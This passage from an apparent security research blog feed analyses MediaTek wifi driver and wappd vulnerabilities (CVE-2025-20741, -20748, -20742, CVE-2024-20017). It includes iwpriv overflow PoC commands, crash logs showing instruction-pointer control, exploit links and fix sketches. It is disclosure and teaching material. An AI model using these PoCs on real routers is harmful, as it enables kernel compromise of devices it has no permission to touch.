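static int copy_ip_string(char ip_str[IP_STR_LEN], const char *arg)
{
    size_t len;

    assert(ip_str != NULL && arg != NULL);
    len = strlen(arg);
    if (len >= IP_STR_LEN)
        return -1;
    memcpy(ip_str, arg, len + 1);   /* +1 copies the NUL terminator too */
    return 0;
}
```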

<h4 id="poc-14">PoC</h4>

<p>Execute the command below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpSnExemptIP</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*200)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20741-heap-overflow-in-vie_oper_proc">CVE-2025-20741: Heap Overflow in vie_oper_proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a heap buffer overflow when handling the incoming command string passed in via the <code class="language-plaintext highlighter-rouge">ioctl()</code> handler and <code class="language-plaintext highlighter-rouge">iwpriv</code> interface. The overflow happens because <code class="language-plaintext highlighter-rouge">sscanf()</code> parses a string token from the incoming string with no length restriction and writes it to a heap-allocated buffer, overflowing it whenever the token is longer than the allocation. In this case, the size of the allocated buffer is calculated with the expression <code class="language-plaintext highlighter-rouge">sizeof((MAX_VENDOR_IE_LEN + 1) * 2)</code>, which yields the size of the <em>type</em> of the arithmetic expression rather than its value (as appears to be the intent). In effect, the allocation will always be for <code class="language-plaintext highlighter-rouge">sizeof(unsigned int)</code> bytes (4).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">if</span> <span class="p">(</span><span class="n">arg</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE on last `%s` field into `ctnt`</span>
        <span class="n">input_argument</span> <span class="o">=</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span>
                    <span class="s">"%d-frm_map:%x-oui:%6s-length:%d-ctnt:%s"</span><span class="p">,</span>
                    <span class="o">&amp;</span><span class="n">op</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">frm_map</span><span class="p">,</span> <span class="n">oui</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">,</span> <span class="n">ctnt</span><span class="p">);</span>
		<span class="p">...</span>
        <span class="p">}</span>
</code></pre></div></div>
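
<p>The <code class="language-plaintext highlighter-rouge">sizeof</code> mistake is easy to reproduce in isolation. In the sketch below the value of <code class="language-plaintext highlighter-rouge">MAX_VENDOR_IE_LEN</code> is a placeholder I picked for illustration (the driver's real constant may differ), and the two helper functions are hypothetical.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Placeholder value for illustration; the driver's real constant may differ. */
#define MAX_VENDOR_IE_LEN 255

/* What the buggy expression yields: the size of the expression's type. */
static size_t buggy_alloc_size(void)
{
    return sizeof((MAX_VENDOR_IE_LEN + 1) * 2);
}

/* What was presumably intended: the value of the expression. */
static size_t intended_alloc_size(void)
{
    return (size_t)(MAX_VENDOR_IE_LEN + 1) * 2;
}

/* With a plain integer constant the operand has type int, and sizeof
 * never evaluates the arithmetic at all. */
static_assert(sizeof((MAX_VENDOR_IE_LEN + 1) * 2) == sizeof(int),
              "sizeof of an arithmetic expression is the size of its type");
```

<p>With this placeholder, <code class="language-plaintext highlighter-rouge">intended_alloc_size()</code> returns 512 while <code class="language-plaintext highlighter-rouge">buggy_alloc_size()</code> returns the size of an <code class="language-plaintext highlighter-rouge">int</code>, which is why even a short <code class="language-plaintext highlighter-rouge">ctnt</code> token overflows the allocation.</p>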

<h4 id="poc-15">PoC</h4>

<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> command for the <code class="language-plaintext highlighter-rouge">vie_op</code> key.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">vie_op</span><span class="o">=</span>1-frm_map:1-oui:00bbaa-length:1194-ctnt:<span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*600)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20748-kernel-code-execution-via-oob-write-in-setrxvrecorden">CVE-2025-20748: Kernel Code Execution via OOB Write in SetRxvRecordEn</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">SetRxvRecordEn()</code>, which is the handler for the <code class="language-plaintext highlighter-rouge">iwpriv set RxvRecordEn</code> subcommand. Within this function, an attacker-controlled argument string is parsed using the insecure string function <code class="language-plaintext highlighter-rouge">sscanf()</code> without a field width or any upper bound on the length of the argument string. This results in a buffer overflow of the <code class="language-plaintext highlighter-rouge">obj-&gt;RxvFilePath[256]</code> buffer, contained within the device object for the underlying network interface. As there is no upper bound on the write size, it’s possible to corrupt almost the entirety of the <code class="language-plaintext highlighter-rouge">struct wdev</code> object and beyond.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">rv</span> <span class="o">=</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span> <span class="s">"%d-%d-%d-%d-%d-%d-%d-%d-%s"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">Enable</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">Mode</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">wcid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">band_idx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">error_en</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">RxvFilePath</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
</code></pre></div></div>
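
<p>A field width on the <code class="language-plaintext highlighter-rouge">%s</code> conversion is what bounds a write like this one. The sketch below is a userspace model with a shortened format string (two integers instead of eight) to keep it readable; <code class="language-plaintext highlighter-rouge">parse_rxv_arg()</code> and <code class="language-plaintext highlighter-rouge">RXV_PATH_LEN</code> are hypothetical names, and I have not checked how the vendor actually patched it.</p>

```c
#include <assert.h>
#include <stdio.h>

#define RXV_PATH_LEN 256

/* Hypothetical parse of a shortened "<enable>-<mode>-<path>" argument.
 * The %255s width leaves room for the terminator in a 256-byte buffer.
 * Returns 0 when all fields parse and the path was not truncated. */
static int parse_rxv_arg(const char *arg, int *enable, int *mode,
                         char path[RXV_PATH_LEN])
{
    int consumed = 0;

    assert(arg != NULL && enable != NULL && mode != NULL && path != NULL);
    if (sscanf(arg, "%d-%d-%255s%n", enable, mode, path, &consumed) != 3)
        return -1;
    /* Leftover input means the token was longer than the width allowed
     * (or had trailing data), so treat it as an error. */
    return arg[consumed] == '\0' ? 0 : -1;
}
```

<p>The <code class="language-plaintext highlighter-rouge">%n</code> check is optional; the width alone prevents the overflow, and the extra check just turns silent truncation into an explicit failure.</p>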

<h4 id="poc-corrupt-kernel-memory">PoC: Corrupt Kernel Memory</h4>

<p>To trigger the vulnerability and corrupt memory:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">RxvRecordEn</span><span class="o">=</span>1-1-0-1-5-1-5-5-<span class="si">$(</span>python <span class="nt">-c</span> <span class="s2">"print('A'*400)"</span><span class="si">)</span>
</code></pre></div></div>

<p>After running the command, perform an operation that causes a notification to be sent to the enrolled notify handlers. An easy way to do this is to trigger a ‘link down’ operation on the interface via <code class="language-plaintext highlighter-rouge">ifconfig ra0 down</code>. Another option is to run <code class="language-plaintext highlighter-rouge">iwpriv ra0 set SSID=&lt;anything&gt;</code>, which re-inits the interface and triggers a notify call. A crash should occur in the function <code class="language-plaintext highlighter-rouge">mt_notify_call_chain()</code> upon access to a corrupted portion of the <code class="language-plaintext highlighter-rouge">WifiSysInfo</code> struct in the device struct for the interface.</p>

<h4 id="poc-kernel-ip-control">PoC: Kernel IP Control</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20748.c">PoC Link</a></p>

<p>The PoC leverages the vulnerability to corrupt the adjacent <code class="language-plaintext highlighter-rouge">WifiSysInfo</code> object and hijack execution flow in the kernel. This object contains linked lists pointing to <code class="language-plaintext highlighter-rouge">struct notify_entry</code> objects, each of which contains a function pointer at <code class="language-plaintext highlighter-rouge">notify_entry.notify_caller</code>. Corrupting the list pointers so that they point to a fake <code class="language-plaintext highlighter-rouge">struct notify_entry</code> object therefore hijacks execution flow when the embedded callback function is executed. The PoC makes use of a kernel info leak available through the iwpriv <code class="language-plaintext highlighter-rouge">mac</code> subcommand handler to determine the address of memory containing controlled data in the kernel and writes a forged object to align with the <code class="language-plaintext highlighter-rouge">notify_entry</code> structure.</p>

<p>Executing the PoC will result in execution being redirected to the address <code class="language-plaintext highlighter-rouge">0x1337babe1337babe</code> (tested on the <code class="language-plaintext highlighter-rouge">MediaTek MT7622 AX3600-gmac1-WAX206</code> board, Linux 4.x). The output below shows successful control of the instruction pointer.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 2750.312397] [PMF]APPMFInit:: apidx=0, MFPC=1, MFPR=0, SHA256=0
[ 2750.318306] [PMF]PMF_MakeRsnIeGMgmtCipher: Insert BIP to the group management cipher of RSNIE
[ 2750.326896] wifi_sys_linkdown(), wdev idx = 0
[ 2750.331284] Internal error: Oops - SP/PC alignment exception: 8a000000 [#1] PREEMPT SMP
[ 2750.339278] Modules linked in: &lt;snip&gt;
[ 2750.463620] CPU: 0 PID: 13791 Comm: iwpriv Tainted: P                4.4.198 #0
[ 2750.470919] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 2750.477698] task: ffffffc01e641600 task.stack: ffffffc01e730000
[ 2750.483610] PC is at 0x37babe1337babe
[ 2750.487424] LR is at mt_notify_call_chain+0x3c/0x58 [mt7622_mt_wifi]
[ 2750.493770] pc : [&lt;0037babe1337babe&gt;] lr : [&lt;ffffff80010b213c&gt;] pstate: 80000145
[ 2750.501154] sp : ffffffc01e733850
[ 2750.504461] x29: ffffffc01e733850 x28: ffffff80012074d8
[ 2750.509773] x27: ffffff80012d35b0 x26: ffffffc019bf2000
[ 2750.515085] x25: ffffff800ae7ac34 x24: ffffffc01dc38485
[ 2750.520397] x23: 0000000000000000 x22: 0000000000000001
[ 2750.525708] x21: 0000000000000005 x20: ffffffc01e7338b0
[ 2750.531020] x19: 0000000000000000 x18: 0000000000000001
[ 2750.536332] x17: 0000007f8633d340 x16: ffffff800815a0b0
[ 2750.541643] x15: 0000000000000000 x14: 00000064000001f4
[ 2750.546955] x13: 0000131100000000 x12: 0002ffba006e0200
[ 2750.552267] x11: 0000000000000000 x10: 0000040404010001
[ 2750.557578] x9 : 0000000604010100 x8 : ffffff800b370f28
[ 2750.562890] x7 : ffffff800ae75e88 x6 : ffffffc01e733a48
[ 2750.568202] x5 : 0000000000000040 x4 : 0000000000000000
[ 2750.573513] x3 : 1337babe1337babe x2 : ffffffc01e7338b0
[ 2750.578825] x1 : 0000000000000005 x0 : ffffffc0150fb010
[ 2750.584137]
</code></pre></div></div>

<h3 id="cve-2025-20742-heap-overflow-in-ft_r1khentryinsert">CVE-2025-20742: Heap Overflow in FT_R1khEntryInsert</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7915 v7.4.0.0, MT7629 v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206, Starlink Wifi Gen2</li>
</ul>

<p>The vulnerability occurs due to a lack of bounds checking on the attacker-controlled values prior to using one of those values as the size argument to a write operation in <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code>. This function is reached via an ioctl to the RT_PRIV command with subcommand/OID <code class="language-plaintext highlighter-rouge">RT_SET_FT_KEY_RSP</code>, and expects the data sent from userspace to be in the format of a <code class="language-plaintext highlighter-rouge">struct FT_KDP_EVT_KEY_ELM</code> object. This object includes another embedded object of type <code class="language-plaintext highlighter-rouge">FT_KDP_PMK_KEY_INFO</code>, which has members representing the actual key material being transmitted. These members include a statically sized buffer <code class="language-plaintext highlighter-rouge">R0KHID[48]</code> and a size value in <code class="language-plaintext highlighter-rouge">R0KHIDLen</code>, with the latter defining the actual size of the data in <code class="language-plaintext highlighter-rouge">R0KHID[48]</code>.</p>

<p>After copying the argument data from userspace into a kernel allocated buffer in <code class="language-plaintext highlighter-rouge">RTMPAPSetInformation()</code>, this data is passed to <code class="language-plaintext highlighter-rouge">FT_KDP_KeyResponseToUs()</code> for processing/handling. Some initial parsing is done on the data and then it is cast to type <code class="language-plaintext highlighter-rouge">FT_KDP_EVT_KEY_ELM</code> and some basic validation is done on some values of the struct. The code continues on to call <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code> and passes in pointers to multiple members of the key element struct sent by the client, including the <code class="language-plaintext highlighter-rouge">R0KHID</code> and <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> members.</p>

<p>In <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code>, an allocation is made to hold the data for an object of type <code class="language-plaintext highlighter-rouge">FT_R1HK_ENTRY</code> (148 bytes) and the values passed in as arguments to the function are used to initialize the new object. The vulnerability occurs when the <code class="language-plaintext highlighter-rouge">R0KHID</code> data is copied from the source buffer into a destination buffer using the <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> sent in the attacker-controlled key element struct without checking that it does not exceed the size of the destination (49 bytes). The <code class="language-plaintext highlighter-rouge">R0KHIDLen</code> field of the <code class="language-plaintext highlighter-rouge">FT_KDP_PMK_KEY_INFO</code> is of type <code class="language-plaintext highlighter-rouge">unsigned char</code>, meaning that the maximum value it can hold is 255, so this is the max value that can be chosen by an attacker. This results in the ability to overflow the <code class="language-plaintext highlighter-rouge">FT_R1HK_ENTRY.R0khId[49]</code> buffer by up to 206 bytes (255 - 49).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// @hypr: allocation of vulnerable obj</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">alloc_mem</span><span class="p">(</span><span class="n">p_obj</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">entry</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">FT_R1HK_ENTRY</span><span class="p">))</span> <span class="o">==</span> <span class="n">NDIS_STATUS_FAILURE</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// error case</span>
    <span class="p">}</span>
	<span class="p">...</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pR0khId</span> <span class="o">!=</span> <span class="nb">NULL</span> <span class="o">&amp;&amp;</span> <span class="n">R0KHIDLen</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">entry</span><span class="o">-&gt;</span><span class="n">R0khIdLen</span> <span class="o">=</span> <span class="n">R0KHIDLen</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">entry</span><span class="o">-&gt;</span><span class="n">R0khId</span><span class="p">,</span> <span class="n">pR0khId</span><span class="p">,</span> <span class="n">R0KHIDLen</span><span class="p">);</span>
    <span class="p">}</span>
</code></pre></div></div>
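
<p>To make the missing check concrete, here is a small userspace sketch of a length-validated copy. The struct is a reduced stand-in containing only the two fields touched by the vulnerable code, and <code class="language-plaintext highlighter-rouge">struct r1kh_entry_model</code>, <code class="language-plaintext highlighter-rouge">set_r0kh_id()</code>, and <code class="language-plaintext highlighter-rouge">R0KHID_DST_LEN</code> are hypothetical names; only the 49-byte destination size comes from the description above.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define R0KHID_DST_LEN 49   /* destination size described above */

/* Reduced stand-in for the entry object; only the fields touched here. */
struct r1kh_entry_model {
    unsigned char r0kh_id[R0KHID_DST_LEN];
    unsigned char r0kh_id_len;
};

/* Hypothetical checked copy: rejects lengths larger than the destination
 * and leaves the entry untouched on failure. */
static int set_r0kh_id(struct r1kh_entry_model *entry,
                       const unsigned char *id, unsigned char id_len)
{
    assert(entry != NULL && id != NULL);
    if (id_len == 0 || id_len > sizeof(entry->r0kh_id))
        return -1;
    memcpy(entry->r0kh_id, id, id_len);
    entry->r0kh_id_len = id_len;
    return 0;
}
```

<p>Because the length arrives as an <code class="language-plaintext highlighter-rouge">unsigned char</code>, the check only has to rule out the range 50 to 255, which is exactly the window the PoC uses.</p>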

<h4 id="poc-16">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20742.c">PoC Link</a></p>

<p>The linked PoC can be used to trigger the vulnerability and cause a crash like the one shown in the output below. It may require more than a single run to corrupt memory enough to cause a crash but this will usually happen within 3 runs. <em>NOTE: multiple runs will require changing the filler byte argument each run, otherwise the request won’t be seen as a new entry and no action will be taken.</em></p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc 0x42
</code></pre></div></div>

<p>It will produce output like this upon crashing:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 8566.183685] Unable to handle kernel paging request at virtual address 42424242424242
[ 8566.191426] pgd = ffffffc014989000
[ 8566.194820] [42424242424242] *pgd=0000000000000000, *pud=0000000000000000
[ 8566.201610] Internal error: Oops: 96000004 [#2] PREEMPT SMP
[ 8566.331494] CPU: 1 PID: 0 Comm: swapper/1 Tainted: P      D         4.4.198 #0
[ 8566.338707] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 8566.345486] task: ffffffc0030bee00 task.stack: ffffffc003100000
[ 8566.351402] PC is at __kmalloc+0x110/0x1f0
[ 8566.355489] LR is at __kmalloc+0x4c/0x1f0
[ 8566.359490] pc : [&lt;ffffff8008143208&gt;] lr : [&lt;ffffff8008143144&gt;] pstate: 60000145
[ 8566.366875] sp : ffffffc01ffb7b10
[ 8566.370181] x29: ffffffc01ffb7b10 x28: ffffff800a6d4fd0
[ 8566.375493] x27: ffffff800a671000 x26: 0000000080000100
[ 8566.380805] x25: ffffffc01ffb7d80 x24: 0000000000000005
[ 8566.386117] x23: 0000000000127169 x22: ffffff8000a3adc0
[ 8566.391429] x21: 0000000002080020 x20: 4242424242424242
</code></pre></div></div>

<p>A full LPE exploit using this bug and a couple of others against the WAX206 has been written and will be released along with this post. More details will be given in an upcoming blog post :)</p>

<p><img src="/assets/images/mtk-rk1h-modprobe-exploit.png" alt="rk1h exploit" /></p>

<h2 id="wrapping-up">wrapping up</h2>

<p><img src="/assets/images/stop-hes-dead.jpg" alt="dead" /></p>

<p>That’s it! But more to come soon, including a deep dive into the <strong>full-chain exploit for CVE-2025-20742</strong> and a look at a few bugs <em>not</em> included in this post which impact the WPA EAPOL handlers and which are <strong><em>remotely exploitable</em></strong>! I’m also working on cleaning up some code I wrote earlier this year for a QEMU PCI device to emulate the MT7622 (at least enough to load the driver and interact with the ioctl handlers) which was <em>super</em> useful for debugging and reproducing bugs without the limitations of the test device I had access to. So, stay tuned :)</p>

<h2 id="references">references</h2>

<ul>
  <li><a href="https://github.com/mellow-hype/mediarekt-2025">PoC Code</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/February-2025">MediaTek Security Bulletin - February 2025</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/October-2025">MediaTek Security Bulletin - October 2025</a></li>
  <li><a href="https://corp.mediatek.com/product-security-bulletin/November-2025">MediaTek Security Bulletin - November 2025</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="0days" /><category term="mediatek" /><category term="wifi" /><category term="exploits" /><summary type="html"><![CDATA[A year-in-review going over 19+ bugs in Mediatek's MT76xx/MT7915 (and others) wifi chipsets I reported this year, PoCs included!]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/stop-hes-dead.jpg" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/stop-hes-dead.jpg" xmlns:media="http://search.yahoo.com/mrss/" /></entry><entry><title type="html">4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways</title><link href="https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html" rel="alternate" type="text/html" title="4 exploits, 1 bug: exploiting CVE-2024-20017 4 different ways" /><published>2024-08-30T00:00:00+00:00</published><updated>2024-08-30T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2024/08/30/exploiting-CVE-2024-20017-four-different-ways.html"><![CDATA[<p>This post goes over 4 different exploits for CVE-2024-20017, a remotely exploitable buffer
overflow vulnerability I discovered in a network daemon that’s shipped with the Mediatek MT7622 SDK
and OpenWrt. I use the bug as a sort of case study to explore the different exploit strategies that
could be taken in different situations, starting with the simplest version and moving all the way up
to an exploit for a real-world target: the version of this daemon shipped on the Netgear WAX206
wireless router. Strap in, cuz it’s a long one.</p>

<h2 id="introduction">introduction</h2>

<p>Well, here we are. This post was meant to be finished around March of this year to coincide with the
publication of the vulnerability I’m going to be writing about, <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20017" target="_blank">CVE-2024-20017</a>. Unfortunately, this
also ended up coinciding with me moving, starting a new job, and getting really busy at said job,
so here we are nearly 6 months later. This post is probably going to be one of my longest, so strap
in.</p>

<p>At the end of last year I discovered and reported a vulnerability in <code class="language-plaintext highlighter-rouge">wappd</code>, a network daemon that
is a part of the MediaTek MT7622/MT7915 SDK and RTxxxx SoftAP driver bundle. This chipset is
commonly used on embedded platforms that support Wifi6 (802.11ax) including Ubiquiti, Xiaomi, and
Netgear devices. As is the case for a handful of other bugs I’ve found, I originally came across
this code while looking for bugs on an embedded device: the Netgear WAX206 wireless router. The
<code class="language-plaintext highlighter-rouge">wappd</code> service is primarily used to configure and coordinate the operations of wireless interfaces
and access points using Hotspot 2.0 and related technologies. The structure of the application is a
bit complex but it’s essentially composed of this network service, a set of local services which
interact with the wireless interfaces on the device, and communication channels between the various
components, using Unix domain sockets.</p>

<ul>
  <li>Affected chipsets: MT6890, MT7915, MT7916, MT7981, MT7986, MT7622</li>
  <li>Affected software: SDK version 7.4.0.1 and before (for MT7915) / SDK version 7.6.7.0 and before (for MT7916, MT7981 and MT7986) / OpenWrt 19.07, 21.02</li>
</ul>

<p>The vulnerability is a buffer overflow caused by a copy operation that uses a length value taken
directly from attacker-controlled packet data without bounds checking.  Overall it’s a pretty simple
bug to understand as it’s just a run-of-the-mill stack buffer overflow, so I thought I’d use this
bug as a case study to explore <em>multiple</em> exploit strategies that can be taken for this one
bug, applying different exploit mitigations and conditions along the way. I think this is
interesting as it provides an opportunity to focus on the more creative parts of exploit
development: once you know there’s a bug, and you understand the constraints, coming up with all of
the different ways you can influence the logic of the application and the effects of the bug to get
code execution and pop a shell.</p>

<p>This post will go over 4 exploits for this bug, starting with the simplest version (no stack
canaries, no ASLR, corrupted return address) all the way up to an exploit written for the <code class="language-plaintext highlighter-rouge">wappd</code>
binary shipped on the Netgear WAX206, where multiple mitigations are enabled and we go from x86-64
to arm64. The code for the exploits can be found <a href="https://github.com/mellow-hype/cve-2024-20017" target="_blank">here</a>; it’s pretty heavily commented to help make
things clearer. It might help to keep those in sight while reading the post so I’ve included links
to the relevant exploit at the start of each section.</p>

<p><em>NOTE: The first 3 exploits discussed below were written for a version of wappd I compiled myself
on an x86_64 machine and with some slight modifications (different sets of mitigations, disabling
forking behavior, compiler optimization).</em></p>

<h2 id="background">background</h2>

<h3 id="discovery">discovery</h3>

<p>This bug was discovered through fuzzing with a network-based fuzzer named <a href="https://github.com/denandz/fuzzotron" target="_blank">fuzzotron</a> that I was trying
out for the first time. Check out the Github page for more info but tl;dr it can use <code class="language-plaintext highlighter-rouge">radamsa</code> or
<code class="language-plaintext highlighter-rouge">blab</code> for testcase generation and provides a quick way to fuzz network services with minimal
overhead. In the case of this target, I used <code class="language-plaintext highlighter-rouge">radamsa</code> for mutations and generated a starting corpus
manually using Python to define the structure of the expected packet data and write it to disk. I
also made a minor modification to the <code class="language-plaintext highlighter-rouge">wapp</code> daemon code so that it saved a copy of the last packet
it received to disk as soon as it came in to ensure crashing cases could be saved for triage.</p>

<h3 id="root-cause-analysis">root cause analysis</h3>

<p>The vulnerability occurs due to a lack of bounds checking in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> prior to using
an attacker-controlled value in a call to <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code> (a wrapper around <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>)
to copy data into a 167-byte stack-allocated structure.</p>

<p>After reading data from either the UDP or TCP socket in <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerUdp()</code> or <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerTcp()</code>,
respectively, the raw data is cast to <code class="language-plaintext highlighter-rouge">struct IappHdr</code> and the <code class="language-plaintext highlighter-rouge">command</code> field is checked; if this
is command <code class="language-plaintext highlighter-rouge">50</code>, the <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> function will be reached and passed a pointer to the raw
data received from the socket. Inside <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code>, the data is cast to
<code class="language-plaintext highlighter-rouge">struct RT_IAPP_SEND_SECURITY_BLOCK *</code> and assigned to the pointer <code class="language-plaintext highlighter-rouge">pSendSB</code>;  <code class="language-plaintext highlighter-rouge">pSendSB-&gt;Length</code> is
then accessed and used to calculate the length of the data attached to the struct. After copying the
payload data from the cast struct pointer to the <code class="language-plaintext highlighter-rouge">pCmdBuf</code> pointer that is also passed in as an
argument, a call to the macro <code class="language-plaintext highlighter-rouge">IAPP_MEM_MOVE()</code> is made (last line in the snippet below) using the
value of the attacker-controlled <code class="language-plaintext highlighter-rouge">Length</code> field to write from the <code class="language-plaintext highlighter-rouge">pSendSB-&gt;SB</code> buffer field to the
<code class="language-plaintext highlighter-rouge">kdp_info</code> struct declared at the start of the function. Prior to this call, the only bounds check
done on this value is to check that it does not exceed the maximum packet length of 1600 bytes. As
the size of the destination <code class="language-plaintext highlighter-rouge">kdp_info</code> struct is only 167 bytes, this results in a stack buffer
overflow of up to 1433 bytes of attacker-controlled data.</p>

<p>The vulnerable code snippet from <code class="language-plaintext highlighter-rouge">IAPP_RcvHandlerSSB()</code> is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="n">pSendSB</span> <span class="o">=</span> <span class="p">(</span><span class="n">RT_IAPP_SEND_SECURITY_BLOCK</span> <span class="o">*</span><span class="p">)</span> <span class="n">pPktBuf</span><span class="p">;</span>

  <span class="n">BufLen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">OID_REQ</span><span class="p">);</span>
  <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span> <span class="o">=</span> <span class="n">NTOH_S</span><span class="p">(</span><span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">);</span>
  <span class="n">BufLen</span> <span class="o">+=</span> <span class="n">FT_IP_ADDRESS_SIZE</span> <span class="o">+</span> <span class="n">IAPP_SB_INIT_VEC_SIZE</span> <span class="o">+</span> <span class="n">pSendSB</span><span class="o">-&gt;</span><span class="n">Length</span><span class="p">;</span>

  <span class="n">IAPP_CMD_BUF_ALLOCATE</span><span class="p">(</span><span class="n">pCmdBuf</span><span class="p">,</span> <span class="n">pBufMsg</span><span class="p">,</span> <span class="n">BufLen</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">pBufMsg</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
    <span class="k">return</span><span class="p">;</span>
  <span class="cm">/* End of if */</span>

  <span class="cm">/* command to notify that a Key Req is received */</span>
  <span class="n">DBGPRINT</span><span class="p">(</span><span class="n">RT_DEBUG_TRACE</span><span class="p">,</span> <span class="s">"iapp&gt; IAPP_RcvHandlerSSB</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="n">OidReq</span> <span class="o">=</span> <span class="p">(</span><span class="n">POID_REQ</span><span class="p">)</span> <span class="n">pBufMsg</span><span class="p">;</span>
  <span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">OID</span> <span class="o">=</span> <span class="p">(</span><span class="n">RT_SET_FT_KEY_REQ</span> <span class="o">|</span> <span class="n">OID_GET_SET_TOGGLE</span><span class="p">);</span>

  <span class="cm">/* peer IP address */</span>
  <span class="n">IAPP_MEM_MOVE</span><span class="p">(</span><span class="n">OidReq</span><span class="o">-&gt;</span><span class="n">Buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">PeerIP</span><span class="p">,</span> <span class="n">FT_IP_ADDRESS_SIZE</span><span class="p">);</span>

  <span class="cm">/* nonce &amp; security block */</span>
